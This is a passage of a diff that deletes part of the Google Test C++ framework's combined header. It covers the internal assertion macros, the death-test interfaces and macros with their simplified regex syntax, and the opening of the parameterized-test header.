-    bool gtest_caught_expected = false; \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (expected_exception const&) { \
-      gtest_caught_expected = true; \
-    } \
-    catch (...) { \
-      gtest_msg.value = \
-          "Expected: " #statement " throws an exception of type " \
-          #expected_exception ".\n  Actual: it throws a different type."; \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__); \
-    } \
-    if (!gtest_caught_expected) { \
-      gtest_msg.value = \
-          "Expected: " #statement " throws an exception of type " \
-          #expected_exception ".\n  Actual: it throws nothing."; \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testthrow_, __LINE__): \
-      fail(gtest_msg.value)
-
-#define GTEST_TEST_NO_THROW_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (...) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testnothrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testnothrow_, __LINE__): \
-      fail("Expected: " #statement " doesn't throw an exception.\n" \
-           "  Actual: it throws.")
-
-#define GTEST_TEST_ANY_THROW_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    bool gtest_caught_any = false; \
-    try { \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    } \
-    catch (...) { \
-      gtest_caught_any = true; \
-    } \
-    if (!gtest_caught_any) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testanythrow_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testanythrow_, __LINE__): \
-      fail("Expected: " #statement " throws an exception.\n" \
-           "  Actual: it doesn't.")
-
-
-// Implements Boolean test assertions such as EXPECT_TRUE. expression can be
-// either a boolean expression or an AssertionResult. text is a textual
-// represenation of expression as it was passed into the EXPECT_TRUE.
-#define GTEST_TEST_BOOLEAN_(expression, text, actual, expected, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (const ::testing::AssertionResult gtest_ar_ = \
-      ::testing::AssertionResult(expression)) \
-    ; \
-  else \
-    fail(::testing::internal::GetBoolAssertionFailureMessage(\
-        gtest_ar_, text, #actual, #expected).c_str())
-
-#define GTEST_TEST_NO_FATAL_FAILURE_(statement, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    ::testing::internal::HasNewFatalFailureHelper gtest_fatal_failure_checker; \
-    GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-    if (gtest_fatal_failure_checker.has_new_fatal_failure()) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_testnofatal_, __LINE__); \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_testnofatal_, __LINE__): \
-      fail("Expected: " #statement " doesn't generate new fatal " \
-           "failures in the current thread.\n" \
-           "  Actual: it does.")
-
-// Expands to the name of the class that implements the given test.
-#define GTEST_TEST_CLASS_NAME_(test_case_name, test_name) \
-  test_case_name##_##test_name##_Test
-
-// Helper macro for defining tests.
-#define GTEST_TEST_(test_case_name, test_name, parent_class, parent_id)\
-class GTEST_TEST_CLASS_NAME_(test_case_name, test_name) : public parent_class {\
- public:\
-  GTEST_TEST_CLASS_NAME_(test_case_name, test_name)() {}\
- private:\
-  virtual void TestBody();\
-  static ::testing::TestInfo* const test_info_ GTEST_ATTRIBUTE_UNUSED_;\
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(\
-      GTEST_TEST_CLASS_NAME_(test_case_name, test_name));\
-};\
-\
-::testing::TestInfo* const GTEST_TEST_CLASS_NAME_(test_case_name, test_name)\
-  ::test_info_ =\
-    ::testing::internal::MakeAndRegisterTestInfo(\
-        #test_case_name, #test_name, NULL, NULL, \
-        (parent_id), \
-        parent_class::SetUpTestCase, \
-        parent_class::TearDownTestCase, \
-        new ::testing::internal::TestFactoryImpl<\
-            GTEST_TEST_CLASS_NAME_(test_case_name, test_name)>);\
-void GTEST_TEST_CLASS_NAME_(test_case_name, test_name)::TestBody()
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the public API for death tests.  It is
-// #included by gtest.h so a user doesn't need to include this
-// directly.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines internal utilities needed for implementing
-// death tests.  They are subject to change without notice.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-
-
-#include <stdio.h>
-
-namespace testing {
-namespace internal {
-
-GTEST_DECLARE_string_(internal_run_death_test);
-
-// Names of the flags (needed for parsing Google Test flags).
-const char kDeathTestStyleFlag[] = "death_test_style";
-const char kDeathTestUseFork[] = "death_test_use_fork";
-const char kInternalRunDeathTestFlag[] = "internal_run_death_test";
-
-#if GTEST_HAS_DEATH_TEST
-
-// DeathTest is a class that hides much of the complexity of the
-// GTEST_DEATH_TEST_ macro.  It is abstract; its static Create method
-// returns a concrete class that depends on the prevailing death test
-// style, as defined by the --gtest_death_test_style and/or
-// --gtest_internal_run_death_test flags.
-
-// In describing the results of death tests, these terms are used with
-// the corresponding definitions:
-//
-// exit status:  The integer exit information in the format specified
-//               by wait(2)
-// exit code:    The integer code passed to exit(3), _exit(2), or
-//               returned from main()
-class GTEST_API_ DeathTest {
- public:
-  // Create returns false if there was an error determining the
-  // appropriate action to take for the current death test; for example,
-  // if the gtest_death_test_style flag is set to an invalid value.
-  // The LastMessage method will return a more detailed message in that
-  // case.  Otherwise, the DeathTest pointer pointed to by the "test"
-  // argument is set.  If the death test should be skipped, the pointer
-  // is set to NULL; otherwise, it is set to the address of a new concrete
-  // DeathTest object that controls the execution of the current test.
-  static bool Create(const char* statement, const RE* regex,
-                     const char* file, int line, DeathTest** test);
-  DeathTest();
-  virtual ~DeathTest() { }
-
-  // A helper class that aborts a death test when it's deleted.
-  class ReturnSentinel {
-   public:
-    explicit ReturnSentinel(DeathTest* test) : test_(test) { }
-    ~ReturnSentinel() { test_->Abort(TEST_ENCOUNTERED_RETURN_STATEMENT); }
-   private:
-    DeathTest* const test_;
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(ReturnSentinel);
-  } GTEST_ATTRIBUTE_UNUSED_;
-
-  // An enumeration of possible roles that may be taken when a death
-  // test is encountered.  EXECUTE means that the death test logic should
-  // be executed immediately.  OVERSEE means that the program should prepare
-  // the appropriate environment for a child process to execute the death
-  // test, then wait for it to complete.
-  enum TestRole { OVERSEE_TEST, EXECUTE_TEST };
-
-  // An enumeration of the three reasons that a test might be aborted.
-  enum AbortReason {
-    TEST_ENCOUNTERED_RETURN_STATEMENT,
-    TEST_THREW_EXCEPTION,
-    TEST_DID_NOT_DIE
-  };
-
-  // Assumes one of the above roles.
-  virtual TestRole AssumeRole() = 0;
-
-  // Waits for the death test to finish and returns its status.
-  virtual int Wait() = 0;
-
-  // Returns true if the death test passed; that is, the test process
-  // exited during the test, its exit status matches a user-supplied
-  // predicate, and its stderr output matches a user-supplied regular
-  // expression.
-  // The user-supplied predicate may be a macro expression rather
-  // than a function pointer or functor, or else Wait and Passed could
-  // be combined.
-  virtual bool Passed(bool exit_status_ok) = 0;
-
-  // Signals that the death test did not die as expected.
-  virtual void Abort(AbortReason reason) = 0;
-
-  // Returns a human-readable outcome message regarding the outcome of
-  // the last death test.
-  static const char* LastMessage();
-
-  static void set_last_death_test_message(const std::string& message);
-
- private:
-  // A string containing a description of the outcome of the last death test.
-  static std::string last_death_test_message_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(DeathTest);
-};
-
-// Factory interface for death tests.  May be mocked out for testing.
-class DeathTestFactory {
- public:
-  virtual ~DeathTestFactory() { }
-  virtual bool Create(const char* statement, const RE* regex,
-                      const char* file, int line, DeathTest** test) = 0;
-};
-
-// A concrete DeathTestFactory implementation for normal use.
-class DefaultDeathTestFactory : public DeathTestFactory {
- public:
-  virtual bool Create(const char* statement, const RE* regex,
-                      const char* file, int line, DeathTest** test);
-};
-
-// Returns true if exit_status describes a process that was terminated
-// by a signal, or exited normally with a nonzero exit code.
-GTEST_API_ bool ExitedUnsuccessfully(int exit_status);
-
-// Traps C++ exceptions escaping statement and reports them as test
-// failures. Note that trapping SEH exceptions is not implemented here.
-# if GTEST_HAS_EXCEPTIONS
-#  define GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, death_test) \
-  try { \
-    GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-  } catch (const ::std::exception& gtest_exception) { \
-    fprintf(\
-        stderr, \
-        "\n%s: Caught std::exception-derived exception escaping the " \
-        "death test statement. Exception message: %s\n", \
-        ::testing::internal::FormatFileLocation(__FILE__, __LINE__).c_str(), \
-        gtest_exception.what()); \
-    fflush(stderr); \
-    death_test->Abort(::testing::internal::DeathTest::TEST_THREW_EXCEPTION); \
-  } catch (...) { \
-    death_test->Abort(::testing::internal::DeathTest::TEST_THREW_EXCEPTION); \
-  }
-
-# else
-#  define GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, death_test) \
-  GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement)
-
-# endif
-
-// This macro is for implementing ASSERT_DEATH*, EXPECT_DEATH*,
-// ASSERT_EXIT*, and EXPECT_EXIT*.
-# define GTEST_DEATH_TEST_(statement, predicate, regex, fail) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-    const ::testing::internal::RE& gtest_regex = (regex); \
-    ::testing::internal::DeathTest* gtest_dt; \
-    if (!::testing::internal::DeathTest::Create(#statement, &gtest_regex, \
-        __FILE__, __LINE__, &gtest_dt)) { \
-      goto GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__); \
-    } \
-    if (gtest_dt != NULL) { \
-      ::testing::internal::scoped_ptr< ::testing::internal::DeathTest> \
-          gtest_dt_ptr(gtest_dt); \
-      switch (gtest_dt->AssumeRole()) { \
-        case ::testing::internal::DeathTest::OVERSEE_TEST: \
-          if (!gtest_dt->Passed(predicate(gtest_dt->Wait()))) { \
-            goto GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__); \
-          } \
-          break; \
-        case ::testing::internal::DeathTest::EXECUTE_TEST: { \
-          ::testing::internal::DeathTest::ReturnSentinel \
-              gtest_sentinel(gtest_dt); \
-          GTEST_EXECUTE_DEATH_TEST_STATEMENT_(statement, gtest_dt); \
-          gtest_dt->Abort(::testing::internal::DeathTest::TEST_DID_NOT_DIE); \
-          break; \
-        } \
-        default: \
-          break; \
-      } \
-    } \
-  } else \
-    GTEST_CONCAT_TOKEN_(gtest_label_, __LINE__): \
-      fail(::testing::internal::DeathTest::LastMessage())
-// The symbol "fail" here expands to something into which a message
-// can be streamed.
-
-// This macro is for implementing ASSERT/EXPECT_DEBUG_DEATH when compiled in
-// NDEBUG mode. In this case we need the statements to be executed, the regex is
-// ignored, and the macro must accept a streamed message even though the message
-// is never printed.
-# define GTEST_EXECUTE_STATEMENT_(statement, regex) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (::testing::internal::AlwaysTrue()) { \
-     GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-  } else \
-    ::testing::Message()
-
-// A class representing the parsed contents of the
-// --gtest_internal_run_death_test flag, as it existed when
-// RUN_ALL_TESTS was called.
-class InternalRunDeathTestFlag {
- public:
-  InternalRunDeathTestFlag(const std::string& a_file,
-                           int a_line,
-                           int an_index,
-                           int a_write_fd)
-      : file_(a_file), line_(a_line), index_(an_index),
-        write_fd_(a_write_fd) {}
-
-  ~InternalRunDeathTestFlag() {
-    if (write_fd_ >= 0)
-      posix::Close(write_fd_);
-  }
-
-  const std::string& file() const { return file_; }
-  int line() const { return line_; }
-  int index() const { return index_; }
-  int write_fd() const { return write_fd_; }
-
- private:
-  std::string file_;
-  int line_;
-  int index_;
-  int write_fd_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(InternalRunDeathTestFlag);
-};
-
-// Returns a newly created InternalRunDeathTestFlag object with fields
-// initialized from the GTEST_FLAG(internal_run_death_test) flag if
-// the flag is specified; otherwise returns NULL.
-InternalRunDeathTestFlag* ParseInternalRunDeathTestFlag();
-
-#else  // GTEST_HAS_DEATH_TEST
-
-// This macro is used for implementing macros such as
-// EXPECT_DEATH_IF_SUPPORTED and ASSERT_DEATH_IF_SUPPORTED on systems where
-// death tests are not supported. Those macros must compile on such systems
-// iff EXPECT_DEATH and ASSERT_DEATH compile with the same parameters on
-// systems that support death tests. This allows one to write such a macro
-// on a system that does not support death tests and be sure that it will
-// compile on a death-test supporting system.
-//
-// Parameters:
-//   statement -  A statement that a macro such as EXPECT_DEATH would test
-//                for program termination. This macro has to make sure this
-//                statement is compiled but not executed, to ensure that
-//                EXPECT_DEATH_IF_SUPPORTED compiles with a certain
-//                parameter iff EXPECT_DEATH compiles with it.
-//   regex     -  A regex that a macro such as EXPECT_DEATH would use to test
-//                the output of statement.  This parameter has to be
-//                compiled but not evaluated by this macro, to ensure that
-//                this macro only accepts expressions that a macro such as
-//                EXPECT_DEATH would accept.
-//   terminator - Must be an empty statement for EXPECT_DEATH_IF_SUPPORTED
-//                and a return statement for ASSERT_DEATH_IF_SUPPORTED.
-//                This ensures that ASSERT_DEATH_IF_SUPPORTED will not
-//                compile inside functions where ASSERT_DEATH doesn't
-//                compile.
-//
-//  The branch that has an always false condition is used to ensure that
-//  statement and regex are compiled (and thus syntactically correct) but
-//  never executed. The unreachable code macro protects the terminator
-//  statement from generating an 'unreachable code' warning in case
-//  statement unconditionally returns or throws. The Message constructor at
-//  the end allows the syntax of streaming additional messages into the
-//  macro, for compilational compatibility with EXPECT_DEATH/ASSERT_DEATH.
-# define GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, terminator) \
-    GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-    if (::testing::internal::AlwaysTrue()) { \
-      GTEST_LOG_(WARNING) \
-          << "Death tests are not supported on this platform.\n" \
-          << "Statement '" #statement "' cannot be verified."; \
-    } else if (::testing::internal::AlwaysFalse()) { \
-      ::testing::internal::RE::PartialMatch(".*", (regex)); \
-      GTEST_SUPPRESS_UNREACHABLE_CODE_WARNING_BELOW_(statement); \
-      terminator; \
-    } else \
-      ::testing::Message()
-
-#endif  // GTEST_HAS_DEATH_TEST
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_DEATH_TEST_INTERNAL_H_
-
-namespace testing {
-
-// This flag controls the style of death tests.  Valid values are "threadsafe",
-// meaning that the death test child process will re-execute the test binary
-// from the start, running only a single death test, or "fast",
-// meaning that the child process will execute the test logic immediately
-// after forking.
-GTEST_DECLARE_string_(death_test_style);
-
-#if GTEST_HAS_DEATH_TEST
-
-namespace internal {
-
-// Returns a Boolean value indicating whether the caller is currently
-// executing in the context of the death test child process.  Tools such as
-// Valgrind heap checkers may need this to modify their behavior in death
-// tests.  IMPORTANT: This is an internal utility.  Using it may break the
-// implementation of death tests.  User code MUST NOT use it.
-GTEST_API_ bool InDeathTestChild();
-
-}  // namespace internal
-
-// The following macros are useful for writing death tests.
-
-// Here's what happens when an ASSERT_DEATH* or EXPECT_DEATH* is
-// executed:
-//
-//   1. It generates a warning if there is more than one active
-//   thread.  This is because it's safe to fork() or clone() only
-//   when there is a single thread.
-//
-//   2. The parent process clone()s a sub-process and runs the death
-//   test in it; the sub-process exits with code 0 at the end of the
-//   death test, if it hasn't exited already.
-//
-//   3. The parent process waits for the sub-process to terminate.
-//
-//   4. The parent process checks the exit code and error message of
-//   the sub-process.
-//
-// Examples:
-//
-//   ASSERT_DEATH(server.SendMessage(56, "Hello"), "Invalid port number");
-//   for (int i = 0; i < 5; i++) {
-//     EXPECT_DEATH(server.ProcessRequest(i),
-//                  "Invalid request .* in ProcessRequest()")
-//                  << "Failed to die on request " << i;
-//   }
-//
-//   ASSERT_EXIT(server.ExitNow(), ::testing::ExitedWithCode(0), "Exiting");
-//
-//   bool KilledBySIGHUP(int exit_code) {
-//     return WIFSIGNALED(exit_code) && WTERMSIG(exit_code) == SIGHUP;
-//   }
-//
-//   ASSERT_EXIT(client.HangUpServer(), KilledBySIGHUP, "Hanging up!");
-//
-// On the regular expressions used in death tests:
-//
-//   On POSIX-compliant systems (*nix), we use the <regex.h> library,
-//   which uses the POSIX extended regex syntax.
-//
-//   On other platforms (e.g. Windows), we only support a simple regex
-//   syntax implemented as part of Google Test.  This limited
-//   implementation should be enough most of the time when writing
-//   death tests; though it lacks many features you can find in PCRE
-//   or POSIX extended regex syntax.  For example, we don't support
-//   union ("x|y"), grouping ("(xy)"), brackets ("[xy]"), and
-//   repetition count ("x{5,7}"), among others.
-//
-//   Below is the syntax that we do support.  We chose it to be a
-//   subset of both PCRE and POSIX extended regex, so it's easy to
-//   learn wherever you come from.  In the following: 'A' denotes a
-//   literal character, period (.), or a single \\ escape sequence;
-//   'x' and 'y' denote regular expressions; 'm' and 'n' are for
-//   natural numbers.
-//
-//     c     matches any literal character c
-//     \\d   matches any decimal digit
-//     \\D   matches any character that's not a decimal digit
-//     \\f   matches \f
-//     \\n   matches \n
-//     \\r   matches \r
-//     \\s   matches any ASCII whitespace, including \n
-//     \\S   matches any character that's not a whitespace
-//     \\t   matches \t
-//     \\v   matches \v
-//     \\w   matches any letter, _, or decimal digit
-//     \\W   matches any character that \\w doesn't match
-//     \\c   matches any literal character c, which must be a punctuation
-//     .     matches any single character except \n
-//     A?    matches 0 or 1 occurrences of A
-//     A*    matches 0 or many occurrences of A
-//     A+    matches 1 or many occurrences of A
-//     ^     matches the beginning of a string (not that of each line)
-//     $     matches the end of a string (not that of each line)
-//     xy    matches x followed by y
-//
-//   If you accidentally use PCRE or POSIX extended regex features
-//   not implemented by us, you will get a run-time failure.  In that
-//   case, please try to rewrite your regular expression within the
-//   above syntax.
-//
-//   This implementation is *not* meant to be as highly tuned or robust
-//   as a compiled regex library, but should perform well enough for a
-//   death test, which already incurs significant overhead by launching
-//   a child process.
-//
-// Known caveats:
-//
-//   A "threadsafe" style death test obtains the path to the test
-//   program from argv[0] and re-executes it in the sub-process.  For
-//   simplicity, the current implementation doesn't search the PATH
-//   when launching the sub-process.  This means that the user must
-//   invoke the test program via a path that contains at least one
-//   path separator (e.g. path/to/foo_test and
-//   /absolute/path/to/bar_test are fine, but foo_test is not).  This
-//   is rarely a problem as people usually don't put the test binary
-//   directory in PATH.
-//
-// TODO(wan@google.com): make thread-safe death tests search the PATH.
-
-// Asserts that a given statement causes the program to exit, with an
-// integer exit status that satisfies predicate, and emitting error output
-// that matches regex.
-# define ASSERT_EXIT(statement, predicate, regex) \
-    GTEST_DEATH_TEST_(statement, predicate, regex, GTEST_FATAL_FAILURE_)
-
-// Like ASSERT_EXIT, but continues on to successive tests in the
-// test case, if any:
-# define EXPECT_EXIT(statement, predicate, regex) \
-    GTEST_DEATH_TEST_(statement, predicate, regex, GTEST_NONFATAL_FAILURE_)
-
-// Asserts that a given statement causes the program to exit, either by
-// explicitly exiting with a nonzero exit code or being killed by a
-// signal, and emitting error output that matches regex.
-# define ASSERT_DEATH(statement, regex) \
-    ASSERT_EXIT(statement, ::testing::internal::ExitedUnsuccessfully, regex)
-
-// Like ASSERT_DEATH, but continues on to successive tests in the
-// test case, if any:
-# define EXPECT_DEATH(statement, regex) \
-    EXPECT_EXIT(statement, ::testing::internal::ExitedUnsuccessfully, regex)
-
-// Two predicate classes that can be used in {ASSERT,EXPECT}_EXIT*:
-
-// Tests that an exit code describes a normal exit with a given exit code.
-class GTEST_API_ ExitedWithCode {
- public:
-  explicit ExitedWithCode(int exit_code);
-  bool operator()(int exit_status) const;
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ExitedWithCode& other);
-
-  const int exit_code_;
-};
-
-# if !GTEST_OS_WINDOWS
-// Tests that an exit code describes an exit due to termination by a
-// given signal.
-class GTEST_API_ KilledBySignal {
- public:
-  explicit KilledBySignal(int signum);
-  bool operator()(int exit_status) const;
- private:
-  const int signum_;
-};
-# endif  // !GTEST_OS_WINDOWS
-
-// EXPECT_DEBUG_DEATH asserts that the given statements die in debug mode.
-// The death testing framework causes this to have interesting semantics,
-// since the sideeffects of the call are only visible in opt mode, and not
-// in debug mode.
-//
-// In practice, this can be used to test functions that utilize the
-// LOG(DFATAL) macro using the following style:
-//
-// int DieInDebugOr12(int* sideeffect) {
-//   if (sideeffect) {
-//     *sideeffect = 12;
-//   }
-//   LOG(DFATAL) << "death";
-//   return 12;
-// }
-//
-// TEST(TestCase, TestDieOr12WorksInDgbAndOpt) {
-//   int sideeffect = 0;
-//   // Only asserts in dbg.
-//   EXPECT_DEBUG_DEATH(DieInDebugOr12(&sideeffect), "death");
-//
-// #ifdef NDEBUG
-//   // opt-mode has sideeffect visible.
-//   EXPECT_EQ(12, sideeffect);
-// #else
-//   // dbg-mode no visible sideeffect.
-//   EXPECT_EQ(0, sideeffect);
-// #endif
-// }
-//
-// This will assert that DieInDebugReturn12InOpt() crashes in debug
-// mode, usually due to a DCHECK or LOG(DFATAL), but returns the
-// appropriate fallback value (12 in this case) in opt mode. If you
-// need to test that a function has appropriate side-effects in opt
-// mode, include assertions against the side-effects.  A general
-// pattern for this is:
-//
-// EXPECT_DEBUG_DEATH({
-//   // Side-effects here will have an effect after this statement in
-//   // opt mode, but none in debug mode.
-//   EXPECT_EQ(12, DieInDebugOr12(&sideeffect));
-// }, "death");
-//
-# ifdef NDEBUG
-
-#  define EXPECT_DEBUG_DEATH(statement, regex) \
-  GTEST_EXECUTE_STATEMENT_(statement, regex)
-
-#  define ASSERT_DEBUG_DEATH(statement, regex) \
-  GTEST_EXECUTE_STATEMENT_(statement, regex)
-
-# else
-
-#  define EXPECT_DEBUG_DEATH(statement, regex) \
-  EXPECT_DEATH(statement, regex)
-
-#  define ASSERT_DEBUG_DEATH(statement, regex) \
-  ASSERT_DEATH(statement, regex)
-
-# endif  // NDEBUG for EXPECT_DEBUG_DEATH
-#endif  // GTEST_HAS_DEATH_TEST
-
-// EXPECT_DEATH_IF_SUPPORTED(statement, regex) and
-// ASSERT_DEATH_IF_SUPPORTED(statement, regex) expand to real death tests if
-// death tests are supported; otherwise they just issue a warning.  This is
-// useful when you are combining death test assertions with normal test
-// assertions in one test.
-#if GTEST_HAS_DEATH_TEST
-# define EXPECT_DEATH_IF_SUPPORTED(statement, regex) \
-    EXPECT_DEATH(statement, regex)
-# define ASSERT_DEATH_IF_SUPPORTED(statement, regex) \
-    ASSERT_DEATH(statement, regex)
-#else
-# define EXPECT_DEATH_IF_SUPPORTED(statement, regex) \
-    GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, )
-# define ASSERT_DEATH_IF_SUPPORTED(statement, regex) \
-    GTEST_UNSUPPORTED_DEATH_TEST_(statement, regex, return)
-#endif
-
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_DEATH_TEST_H_
-// This file was GENERATED by command:
-//     pump.py gtest-param-test.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: vladl@google.com (Vlad Losev)
-//
-// Macros and functions for implementing parameterized tests
-// in Google C++ Testing Framework (Google Test)
-//
-// This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PARAM_TEST_H_
-
-
-// Value-parameterized tests allow you to test your code with different
-// parameters without writing multiple copies of the same test.
-//
-// Here is how you use value-parameterized tests:
-
-#if 0
-
-// To write value-parameterized tests, first you should define a fixture
-// class. It is usually derived from testing::TestWithParam<T> (see below for
-// another inheritance scheme that's sometimes useful in more complicated
-// class hierarchies), where the type of your parameter values.
-// TestWithParam<T> is itself derived from testing::Test. T can be any
-// copyable type. If it's a raw pointer, you are responsible for managing the
-// lifespan of the pointed values.
-
-class FooTest : public ::testing::TestWithParam<const char*> {
